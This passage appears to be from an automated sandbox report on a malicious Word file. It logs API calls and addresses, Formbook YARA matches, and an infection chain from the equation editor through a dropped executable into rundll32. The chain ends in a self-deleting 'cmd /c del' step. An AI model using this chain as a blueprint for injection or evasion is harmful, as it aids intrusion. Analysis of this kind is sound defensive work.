        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FFB4 NtCreateSection,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008410D0 NtOpenProcessToken,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00840060 NtQuerySection,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008401D4 NtSetValueKey,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0084010C NtOpenDirectoryObject,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00841148 NtOpenThread,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008407AC NtCreateMutant,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083F8CC NtWaitForSingleObject,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00841930 NtSetContextThread,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083F938 NtWriteFile,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FAB8 NtQueryValueKey,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FA20 NtQueryInformationFile,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FA50 NtEnumerateValueKey,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FBE8 NtQueryVirtualMemory,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FB50 NtCreateKey,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FC30 NtOpenProcess,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00840C40 NtGetContextThread,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FC48 NtSetInformationFile,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00841D80 NtSuspendThread,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FD5C NtEnumerateKey,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FE24 NtWriteVirtualMemory,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FFFC NtCreateProcessEx,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FF34 NtQueueApcThread,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026500C4 NtCreateFile,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026507AC NtCreateMutant,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FAE8 NtQueryInformationProcess,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FB68 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264F900 NtReadFile,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264F9F0 NtClose,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FDC0 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02650060 NtQuerySection,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02650078 NtResumeThread,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02650048 NtProtectVirtualMemory,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026510D0 NtOpenProcessToken,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02651148 NtOpenThread,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0265010C NtOpenDirectoryObject,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026501D4 NtSetValueKey,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FA50 NtEnumerateValueKey,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FA20 NtQueryInformationFile,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FAB8 NtQueryValueKey,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FB50 NtCreateKey,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FBE8 NtQueryVirtualMemory,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FBB8 NtQueryInformationToken,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264F8CC NtWaitForSingleObject,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02651930 NtSetContextThread,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264F938 NtWriteFile,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FE24 NtWriteVirtualMemory,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FEA0 NtReadVirtualMemory,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FF34 NtQueueApcThread,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FFFC NtCreateProcessEx,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FFB4 NtCreateSection,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FC60 NtMapViewOfSection,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02650C40 NtGetContextThread,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FC48 NtSetInformationFile,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FC30 NtOpenProcess,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FC90 NtUnmapViewOfSection,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FD5C NtEnumerateKey,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02651D80 NtSuspendThread,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FD8C NtDelayExecution,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000EA070 NtClose,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000EA120 NtAllocateVirtualMemory,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E9F40 NtCreateFile,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E9FF0 NtReadFile,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000EA06C NtClose,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000EA11C NtAllocateVirtualMemory,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E9F3B NtCreateFile,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E9FEA NtReadFile,
        Source: C:\Users\Public\69577.exeCode function: 4_2_01FD11E0 CreateProcessAsUserW,
        Source: C:\Users\Public\69577.exeCode function: 4_2_01FD200A
        Source: C:\Users\Public\69577.exeCode function: 4_2_01FC63AB
        Source: C:\Users\Public\69577.exeCode function: 4_2_01FC48A2
        Source: C:\Users\Public\69577.exeCode function: 4_2_003AB010
        Source: C:\Users\Public\69577.exeCode function: 4_2_003AA810
        Source: C:\Users\Public\69577.exeCode function: 4_2_003AE8F0
        Source: C:\Users\Public\69577.exeCode function: 4_2_003A04E8
        Source: C:\Users\Public\69577.exeCode function: 4_2_003A7500
        Source: C:\Users\Public\69577.exeCode function: 4_2_003A5DD2
        Source: C:\Users\Public\69577.exeCode function: 4_2_003A52D8
        Source: C:\Users\Public\69577.exeCode function: 4_2_003ABAC1
        Source: C:\Users\Public\69577.exeCode function: 4_2_003A8FC1
        Source: C:\Users\Public\69577.exeCode function: 4_2_003AF402
        Source: C:\Users\Public\69577.exeCode function: 4_2_003AB000
        Source: C:\Users\Public\69577.exeCode function: 4_2_003AE8EF
        Source: C:\Users\Public\69577.exeCode function: 4_2_003AE8E1
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00812050
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0008102F
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00081030
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009E1CA
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009D27D
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00082D90
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00089E3C
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00089E40
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00082FB0
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0084E0C6
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0087D005
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00853040
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0086905A
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008CD06D
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0084E2E9
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008F1238
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008F63BF
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0084F3CF
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008763DB
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00852305
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00857353
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0089A37B
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00885485
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00861489
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008D443E
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0088D47D
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0086C5F0
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0085351F
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00896540
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00854680
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0085E6C1
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008F2622
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0089A634
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008D579A
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0085C7BC
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008857C3
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008EF8EE
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0085C85C
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0087286D
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008F098E
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008529B2
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008669FE
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008D394B
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008D5955
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00903A83
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008FCBA4
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0084FBD7
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008DDBDA
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00877B00
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008EFDDD
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00880D3B
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0085CD5B
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00882E2F
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0086EE4C
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008ECFB1
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008C2FDC
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00860F3F
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0087DF7C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02701238
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0265E2E9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026AA37B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02667353
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02662305
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0265F3CF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026863DB
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_027063BF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02663040
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0267905A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0268D005
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0265E0C6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02702622
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026AA634
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0266E6C1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02664680
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026957C3
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0266C7BC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026E579A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0269D47D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026E443E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02695485
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02671489
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026A6540
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0266351F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0267C5F0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02713A83
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02687B00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0265FBD7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026EDBDA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0270CBA4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0268286D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0266C85C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026FF8EE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026E394B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026E5955
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026769FE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026629B2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0270098E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0267EE4C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02692E2F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0268DF7C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02670F3F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026D2FDC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026FCFB1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0266CD5B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02690D3B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026FFDDD
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000EE1CA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000D2D90
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000D9E3C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000D9E40
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000D2FB0
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 161BCBF5F7D766B70ACE9CDF7B3B250D256AB601720F09F4183A1FA4F92DCF54
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0265DF5C appears 119 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0265E2A8 appears 38 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 026A3F92 appears 132 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 026A373B appears 245 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 026CF970 appears 84 times
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 0084DF5C appears 121 times
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 00893F92 appears 132 times
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 008BF970 appears 84 times
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 0089373B appears 245 times
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 0084E2A8 appears 38 times
        Source: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000002.2112664832.0000000003B66000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000002.2112664832.0000000003B66000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000002.2112815271.0000000003CD3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000002.2112815271.0000000003CD3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000005.00000002.2140472679.0000000000310000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000005.00000002.2140472679.0000000000310000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 5.2.AddInProcess32.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 5.2.AddInProcess32.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: explorer.exe, 00000006.00000000.2117611941.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
        Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@9/13@4/2
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$G-50230.docJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC467.tmpJump to behavior
        Source: C:\Users\Public\69577.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\Public\69577.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\Public\69577.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: unknownProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
        Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
        Source: C:\Users\Public\69577.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\Public\69577.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
        Source: IMG-50230.docStatic file information: File size 1332844 > 1048576
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe
        Source: Binary string: wntdll.pdb source: AddInProcess32.exe, rundll32.exe
        Source: Binary string: rundll32.pdb source: AddInProcess32.exe, 00000005.00000002.2140415734.00000000001C4000.00000004.00000020.sdmp
        Source: C:\Users\Public\69577.exeCode function: 4_2_00838556 push esi; ret
        Source: C:\Users\Public\69577.exeCode function: 4_2_01FC05E6 pushfd ; iretd
        Source: C:\Users\Public\69577.exeCode function: 4_2_01FC4B71 push es; iretd
        Source: C:\Users\Public\69577.exeCode function: 4_2_01FC4E9A push es; iretd
        Source: C:\Users\Public\69577.exeCode function: 4_2_01FC0A2A push ds; ret
        Source: C:\Users\Public\69577.exeCode function: 4_2_003ACDF4 push ecx; retf
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00812050 push es; ret
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009D095 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009D0EB push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009D0E2 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009D90D push ebx; retf
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009D14C push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009653F push cs; iretd
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009771B push eax; retf
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_000967E9 push ebx; ret
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0084DFA1 push ecx; ret
